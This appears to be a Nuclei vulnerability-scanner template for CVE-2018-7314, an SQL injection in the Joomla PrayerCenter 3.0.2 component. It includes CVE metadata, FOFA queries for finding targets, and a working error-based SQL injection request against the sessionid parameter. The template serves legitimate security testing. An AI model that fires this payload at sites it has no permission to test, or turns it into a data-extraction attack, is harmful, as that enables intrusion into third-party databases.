id: CVE-2018-7314 info: name: Joomla! Component PrayerCenter 3.0.2 - SQL Injection author: DhiyaneshDK severity: critical description: | SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429. reference: - https://www.exploit-db.com/exploits/44160 - https://github.com/jweny/pocassistdb - https://github.com/0ps/pocassistdb - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7314 cwe-id: CWE-89 epss-score: 0.00282 epss-percentile: 0.67968 cpe: cpe:2.3:a:mlwebtechnologies:prayercenter:3.0.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 vendor: mlwebtechnologies product: prayercenter framework: joomla\! fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" tags: cve,cve2018,joomla,sqli,joomla\!,mlwebtechnologies variables: num: "{{rand_int(800000000, 1000000000)}}" http: - method: GET path: - "{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X" matchers: - type: word part: body words: - "{{md5(num)}}" # digest: 490a00463044022013223ae52cb825068e64f3b321f3ef5f86cd073b7014161dc40db24c4390224a02205f135e1001fdf736739d63eeabdb0b908940f7be65599a41c3ead1cffff0966a:922c64590222798bb761d5b6d8e72950